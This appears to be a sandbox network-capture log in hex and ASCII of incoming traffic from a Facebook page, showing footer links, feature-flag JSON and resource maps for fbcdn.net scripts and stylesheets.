2022-10-07 13:58:40 UTC	100	IN	Data Raw: 35 45 76 72 54 77 63 37 73 64 2d 52 42 36 69 50 71 72 36 35 6d 6e 72 75 33 4a 47 35 53 42 36 30 6e 44 44 71 6e 44 46 55 72 32 6f 52 5a 32 73 35 33 63 61 67 6f 76 4e 70 5f 6a 51 71 48 32 4c 41 74 6b 4b 6b 77 22 20 74 69 74 6c 65 3d 22 43 68 65 63 6b 20 6f 75 74 20 49 6e 73 74 61 67 72 61 6d 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 22 68 6f 76 65 72 22 3e 49 6e 73 74 61 67 72 61 6d 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 75 6c 6c 65 74 69 6e 2e 63 6f 6d 2f 22 20 74 69 74 6c 65 3d 22 43 68 65 63 6b 20 6f 75 74 20 42 75 6c 6c 65 74 69 6e 20 4e 65 77 73 6c 65 74 74 65 72 22 3e 42 75 6c 6c 65 74 Data Ascii: 5EvrTwc7sd-RB6iPqr65mnru3JG5SB60nDDqnDFUr2oRZ2s53cagovNp_jQqH2LAtkKkw" title="Check out Instagram" target="_blank" rel="nofollow" data-lynx-mode="hover">Instagram</a></li><li><a href="https://www.bulletin.com/" title="Check out Bulletin Newsletter">Bullet
2022-10-07 13:58:40 UTC	102	IN	Data Raw: 61 6e 64 20 46 61 63 65 62 6f 6f 6b 2e 22 3e 50 72 69 76 61 63 79 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 70 6f 6c 69 63 69 65 73 2f 63 6f 6f 6b 69 65 73 2f 22 20 74 69 74 6c 65 3d 22 4c 65 61 72 6e 20 61 62 6f 75 74 20 63 6f 6f 6b 69 65 73 20 61 6e 64 20 46 61 63 65 62 6f 6f 6b 2e 22 20 64 61 74 61 2d 6e 6f 63 6f 6f 6b 69 65 73 3d 22 31 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 34 31 75 67 22 20 64 61 74 61 2d 6e 6f 63 6f 6f 6b 69 65 73 3d 22 31 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 68 65 6c 70 2f 35 36 38 31 33 37 34 39 33 33 30 32 32 31 37 22 20 74 69 74 6c 65 3d 22 4c 65 61 72 6e 20 61 62 6f 75 74 20 41 64 Data Ascii: and Facebook.">Privacy</a></li><li><a href="/policies/cookies/" title="Learn about cookies and Facebook." data-nocookies="1">Cookies</a></li><li><a class="_41ug" data-nocookies="1" href="https://www.facebook.com/help/568137493302217" title="Learn about Ad
2022-10-07 13:58:40 UTC	103	IN	Data Raw: 3a 22 41 54 37 42 2d 32 4b 65 48 31 67 4f 4f 56 66 4c 41 38 51 22 7d 2c 22 33 32 31 32 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 37 74 67 64 6f 62 69 45 6f 43 35 71 4f 41 46 55 4d 22 7d 2c 22 31 39 30 38 31 33 35 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 6d 69 47 79 70 4a 6c 33 6d 32 41 71 34 78 38 67 22 7d 2c 22 35 32 34 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 53 4c 4e 52 65 67 31 69 6a 68 33 62 5a 2d 52 49 22 7d 2c 22 32 35 32 36 22 3a 7b 22 72 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 22 41 54 34 47 4a 37 73 7a 6f 42 42 74 47 44 58 78 76 78 63 22 7d 2c 22 38 31 39 32 33 36 22 3a 7b 22 72 65 73 75 6c 74 22 Data Ascii: :"AT7B-2KeH1gOOVfLA8Q"},"3212":{"result":false,"hash":"AT7tgdobiEoC5qOAFUM"},"1908135":{"result":false,"hash":"AT6miGypJl3m2Aq4x8g"},"524":{"result":false,"hash":"AT6SLNReg1ijh3bZ-RI"},"2526":{"result":true,"hash":"AT4GJ7szoBBtGDXxvxc"},"819236":{"result"
2022-10-07 13:58:40 UTC	105	IN	Data Raw: 77 39 45 22 7d 7d 2c 22 71 65 78 44 61 74 61 22 3a 7b 22 36 34 34 22 3a 7b 22 72 22 3a 6e 75 6c 6c 7d 2c 22 36 34 37 22 3a 7b 22 72 22 3a 6e 75 6c 6c 7d 7d 7d 29 7d 29 3b 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 42 6f 6f 74 6c 6f 61 64 65 72 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 6d 29 7b 6d 2e 68 61 6e 64 6c 65 50 61 79 6c 6f 61 64 28 7b 22 63 6f 6e 73 69 73 74 65 6e 63 79 22 3a 7b 22 72 65 76 22 3a 31 30 30 36 33 34 31 35 32 34 7d 2c 22 72 73 72 63 4d 61 70 22 3a 7b 22 6e 36 57 34 78 4d 48 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 37 4d 35 34 5c 2f 79 46 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 42 4c 41 79 Data Ascii: w9E"}},"qexData":{"644":{"r":null},"647":{"r":null}}})});requireLazy(["Bootloader"],function(m){m.handlePayload({"consistency":{"rev":1006341524},"rsrcMap":{"n6W4xMH":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3i7M54\/yF\/l\/en_US\/BLAy
2022-10-07 13:58:40 UTC	106	IN	Data Raw: 70 68 70 5c 2f 76 33 5c 2f 79 55 5c 2f 72 5c 2f 4a 6d 32 6c 32 6a 6c 4c 79 46 36 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 68 4b 59 30 51 4b 54 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 69 5c 2f 72 5c 2f 69 69 44 62 59 4d 43 50 74 42 33 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 68 33 5a 7a 41 6d 47 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 Data Ascii: php\/v3\/yU\/r\/Jm2l2jlLyF6.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"hKY0QKT":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yi\/r\/iiDbYMCPtB3.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"h3ZzAmG":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3
2022-10-07 13:58:40 UTC	108	IN	Data Raw: 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 78 5c 2f 72 5c 2f 58 44 44 2d 50 31 58 39 38 4b 71 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 52 35 77 31 72 43 4a 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 38 5c 2f 72 5c 2f 53 69 78 4d 30 33 41 58 45 77 38 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 49 61 52 5c 2f 36 75 50 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 Data Ascii: /static.xx.fbcdn.net\/rsrc.php\/v3\/yx\/r\/XDD-P1X98Kq.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"R5w1rCJ":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y8\/r\/SixM03AXEw8.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"IaR\/6uP":{"type":"js","src":"https:\/\/stati
2022-10-07 13:58:40 UTC	109	IN	Data Raw: 2c 22 6e 63 22 3a 31 7d 2c 22 68 49 77 41 32 57 36 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 79 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 51 78 68 59 47 51 37 65 31 4b 30 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 6d 52 70 44 77 6d 64 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 68 5c 2f 72 5c 2f 4d 2d 43 32 73 4c 46 4a 50 30 4d 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 Data Ascii: ,"nc":1},"hIwA2W6":{"type":"css","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yy\/l\/0,cross\/QxhYGQ7e1K0.css?_nc_x=Ij3Wp8lg5Kz","nc":1},"mRpDwmd":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yh\/r\/M-C2sLFJP0M.js?_nc_x=Ij3Wp8lg
2022-10-07 13:58:40 UTC	110	IN	Data Raw: 70 68 70 5c 2f 76 33 5c 2f 79 48 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 73 56 46 6f 31 75 63 36 49 34 50 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 46 4a 76 47 4b 5c 2f 6a 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 45 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 79 75 55 30 35 61 47 58 33 7a 35 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 30 52 57 4b 4f 41 63 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 Data Ascii: php\/v3\/yH\/l\/0,cross\/sVFo1uc6I4P.css?_nc_x=Ij3Wp8lg5Kz","nc":1},"FJvGK\/j":{"type":"css","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yE\/l\/0,cross\/yuU05aGX3z5.css?_nc_x=Ij3Wp8lg5Kz","nc":1},"0RWKOAc":{"type":"js","src":"https:\/\/static.xx.f
2022-10-07 13:58:40 UTC	112	IN	Data Raw: 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 66 5c 2f 72 5c 2f 6e 53 5a 37 34 46 46 2d 7a 79 4d 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 36 59 65 33 48 37 45 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 65 77 4e 34 5c 2f 79 5f 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 5f 4a 47 43 51 67 35 6b 69 4c 68 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 59 30 Data Ascii: ":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yf\/r\/nSZ74FF-zyM.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"6Ye3H7E":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iewN4\/y_\/l\/en_US\/_JGCQg5kiLh.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"Y0
2022-10-07 13:58:40 UTC	113	IN	Data Raw: 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 76 5c 2f 72 5c 2f 54 43 68 6f 2d 61 43 35 64 4c 4f 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 64 78 5c 2f 41 67 70 4f 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 4c 5c 2f 72 5c 2f 7a 79 61 4b 33 56 44 67 5a 47 63 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 4c 36 51 77 57 56 49 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e Data Ascii: fbcdn.net\/rsrc.php\/v3\/yv\/r\/TCho-aC5dLO.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"dx\/AgpO":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yL\/r\/zyaK3VDgZGc.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"L6QwWVI":{"type":"css","src":"https:\/\/static.xx.fbcdn
2022-10-07 13:58:41 UTC	115	IN	Data Raw: 68 6b 49 4b 57 6f 71 64 68 69 4c 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 73 32 78 69 74 32 76 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 4e 4f 56 34 5c 2f 79 57 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 50 39 45 4a 42 5f 5f 62 79 59 47 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 69 4e 52 54 6c 6e 71 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 Data Ascii: hkIKWoqdhiL.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"s2xit2v":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iNOV4\/yW\/l\/en_US\/P9EJB__byYG.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"iNRTlnq":{"type":"css","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y
2022-10-07 13:58:41 UTC	116	IN	Data Raw: 22 4d 30 4c 31 44 6f 61 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 63 51 74 34 5c 2f 79 6d 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 41 43 74 7a 4f 4d 6a 6b 72 62 6c 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 6a 6a 32 39 55 5a 42 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 64 5c 2f 72 5c 2f 30 4f 58 63 78 4b 6d 35 69 42 75 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 Data Ascii: "M0L1Doa":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3icQt4\/ym\/l\/en_US\/ACtzOMjkrbl.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"jj29UZB":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yd\/r\/0OXcxKm5iBu.js?_nc_x=Ij3Wp8lg5Kz","nc
2022-10-07 13:58:41 UTC	118	IN	Data Raw: 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 34 6c 72 34 5c 2f 79 74 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 53 76 5f 4c 73 46 45 65 52 47 38 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 78 32 32 4f 62 79 34 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 68 5c 2f 72 5c 2f 39 31 5a 56 4b 55 50 54 71 41 61 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 38 45 4c 43 42 77 48 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 Data Ascii: dn.net\/rsrc.php\/v3i4lr4\/yt\/l\/en_US\/Sv_LsFEeRG8.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"x22Oby4":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yh\/r\/91ZVKUPTqAa.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"8ELCBwH":{"type":"js","src":"https:\/\/static.x
2022-10-07 13:58:41 UTC	119	IN	Data Raw: 78 32 6c 72 47 41 57 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 6c 57 4f 76 47 54 61 22 2c 22 42 49 79 6c 4b 43 34 22 2c 22 46 6e 33 72 41 6c 37 22 2c 22 52 50 4c 48 38 6a 67 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 57 65 62 53 70 65 65 64 49 6e 74 65 72 61 63 74 69 6f 6e 73 54 79 70 65 64 4c 6f 67 67 65 72 22 3a 7b 22 72 22 3a 5b 22 70 51 5c 2f 69 66 58 75 22 2c 22 38 7a 62 45 5a 74 75 22 2c 22 68 4b 59 30 51 4b 54 22 2c 22 42 49 79 6c 4b 43 34 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 41 73 79 6e 63 52 65 71 75 65 73 74 22 3a 7b 22 72 22 3a 5b 22 6e 36 57 34 78 4d 48 22 2c 22 38 7a 62 45 5a 74 75 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 68 33 5a 7a 41 6d Data Ascii: x2lrGAW","vGt2mxz","lWOvGTa","BIylKC4","Fn3rAl7","RPLH8jg"],"be":1},"WebSpeedInteractionsTypedLogger":{"r":["pQ\/ifXu","8zbEZtu","hKY0QKT","BIylKC4"],"rds":{"m":["BanzaiScuba_DEPRECATED"]},"be":1},"AsyncRequest":{"r":["n6W4xMH","8zbEZtu","vGt2mxz","h3ZzAm
2022-10-07 13:58:41 UTC	121	IN	Data Raw: 6e 6f 77 6c 69 66 74 22 3a 7b 22 72 22 3a 5b 22 62 4b 43 6c 54 67 56 22 2c 22 6c 47 30 6f 48 42 43 22 2c 22 62 39 4b 5a 49 48 4a 22 2c 22 71 31 6a 53 5a 38 63 22 2c 22 44 39 58 42 33 67 6a 22 2c 22 64 69 6f 67 56 61 75 22 2c 22 59 74 55 33 43 35 75 22 2c 22 68 49 77 41 32 57 36 22 2c 22 64 41 78 58 30 6a 6a 22 2c 22 6d 52 70 44 77 6d 64 22 2c 22 65 39 41 4e 7a 77 5c 2f 22 2c 22 53 79 48 76 61 66 68 22 2c 22 47 44 70 76 74 4b 33 22 2c 22 43 47 6b 48 34 46 59 22 2c 22 6a 31 76 63 68 56 64 22 2c 22 50 64 39 56 6a 78 6c 22 2c 22 43 51 57 57 67 50 76 22 2c 22 7a 4b 5c 2f 52 45 55 56 22 2c 22 34 33 66 32 4c 2b 36 22 2c 22 64 48 73 4a 51 36 79 22 2c 22 73 72 50 6d 64 74 34 22 2c 22 44 31 5c 2f 4a 54 6d 54 22 2c 22 7a 50 4c 67 49 47 54 22 2c 22 52 58 55 68 43 47 Data Ascii: nowlift":{"r":["bKClTgV","lG0oHBC","b9KZIHJ","q1jSZ8c","D9XB3gj","diogVau","YtU3C5u","hIwA2W6","dAxX0jj","mRpDwmd","e9ANzw\/","SyHvafh","GDpvtK3","CGkH4FY","j1vchVd","Pd9Vjxl","CQWWgPv","zK\/REUV","43f2L+6","dHsJQ6y","srPmdt4","D1\/JTmT","zPLgIGT","RXUhCG
2022-10-07 13:58:41 UTC	122	IN	Data Raw: 56 57 38 65 54 58 22 2c 22 6b 4f 45 48 76 70 75 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 36 59 65 33 48 37 45 22 2c 22 59 30 65 38 68 30 41 22 2c 22 6b 53 39 54 42 76 4f 22 2c 22 6c 57 4f 76 47 54 61 22 2c 22 6c 6c 34 5a 47 5c 2f 79 22 2c 22 4d 30 4c 31 44 6f 61 22 2c 22 68 33 5a 7a 41 6d 47 22 2c 22 4f 4a 30 33 31 65 37 22 2c 22 42 49 79 6c 4b 43 34 22 2c 22 6a 6a 32 39 55 5a 42 22 2c 22 6e 41 47 52 49 34 69 22 2c 22 4c 38 59 63 49 6f 6e 22 2c 22 65 50 65 34 5a 52 36 22 2c 22 63 59 55 33 63 33 32 22 2c 22 46 6e 33 72 41 6c 37 22 2c 22 73 46 44 4a 68 68 77 22 2c 22 52 50 4c 48 38 6a 67 22 2c 22 68 63 36 4d 59 58 55 22 2c 22 30 37 4a 53 69 50 30 22 2c 22 64 78 5c 2f 41 67 70 4f 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 Data Ascii: VW8eTX","kOEHvpu","vGt2mxz","6Ye3H7E","Y0e8h0A","kS9TBvO","lWOvGTa","ll4ZG\/y","M0L1Doa","h3ZzAmG","OJ031e7","BIylKC4","jj29UZB","nAGRI4i","L8YcIon","ePe4ZR6","cYU3c32","Fn3rAl7","sFDJhhw","RPLH8jg","hc6MYXU","07JSiP0","dx\/AgpO"],"rds":{"m":["FbtLogging"
2022-10-07 13:58:41 UTC	124	IN	Data Raw: 65 74 61 69 6c 73 44 69 61 6c 6f 67 41 73 79 6e 63 43 6f 6e 74 72 6f 6c 6c 65 72 22 3a 7b 22 72 22 3a 5b 22 67 57 4d 4a 67 54 65 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 58 4f 66 66 65 72 43 6f 6e 74 72 6f 6c 6c 65 72 22 3a 7b 22 72 22 3a 5b 22 68 49 65 6b 2b 62 47 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 50 65 72 66 58 53 68 61 72 65 64 46 69 65 6c 64 73 22 3a 7b 22 72 22 3a 5b 22 42 49 79 6c 4b 43 34 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 4f 44 53 22 3a 7b 22 72 22 3a 5b 22 38 7a 62 45 5a 74 75 22 2c 22 68 4b 59 30 51 4b 54 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 4b 65 79 45 76 65 6e 74 54 79 70 65 64 4c 6f 67 67 65 72 22 3a 7b 22 72 22 3a 5b 22 38 7a 62 45 5a 74 75 22 2c 22 68 4b 59 30 51 4b 54 22 2c 22 47 6a 38 76 39 4c 34 22 2c 22 42 49 79 6c 4b 43 34 22 5d 2c 22 72 Data Ascii: etailsDialogAsyncController":{"r":["gWMJgTe"],"be":1},"XOfferController":{"r":["hIek+bG"],"be":1},"PerfXSharedFields":{"r":["BIylKC4"],"be":1},"ODS":{"r":["8zbEZtu","hKY0QKT"],"be":1},"KeyEventTypedLogger":{"r":["8zbEZtu","hKY0QKT","Gj8v9L4","BIylKC4"],"r
2022-10-07 13:58:41 UTC	125	IN	Data Raw: 4d 6d 34 47 43 6d 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 43 6f 6e 74 65 78 74 75 61 6c 4c 61 79 65 72 49 6e 6c 69 6e 65 54 61 62 4f 72 64 65 72 22 3a 7b 22 72 22 3a 5b 22 5a 35 4c 46 32 6a 31 22 2c 22 7a 50 4c 67 49 47 54 22 2c 22 51 4d 6d 34 47 43 6d 22 2c 22 38 7a 62 45 5a 74 75 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 6c 57 4f 76 47 54 61 22 2c 22 42 49 79 6c 4b 43 34 22 2c 22 46 6e 33 72 41 6c 37 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 58 55 49 44 69 61 6c 6f 67 42 75 74 74 6f 6e 2e 72 65 61 63 74 22 3a 7b 22 72 22 3a 5b 22 59 74 55 33 43 35 75 22 2c 22 64 41 78 58 30 6a 6a 22 2c 22 7a 4b 5c 2f 52 45 55 56 22 2c 22 73 72 50 6d 64 74 34 22 2c 22 52 35 77 31 72 43 4a 22 2c 22 49 61 52 5c 2f 36 75 50 22 2c 22 51 4d 6d 34 47 43 6d 22 2c 22 6e 36 57 34 78 4d 48 22 Data Ascii: Mm4GCm"],"be":1},"ContextualLayerInlineTabOrder":{"r":["Z5LF2j1","zPLgIGT","QMm4GCm","8zbEZtu","vGt2mxz","lWOvGTa","BIylKC4","Fn3rAl7"],"be":1},"XUIDialogButton.react":{"r":["YtU3C5u","dAxX0jj","zK\/REUV","srPmdt4","R5w1rCJ","IaR\/6uP","QMm4GCm","n6W4xMH"
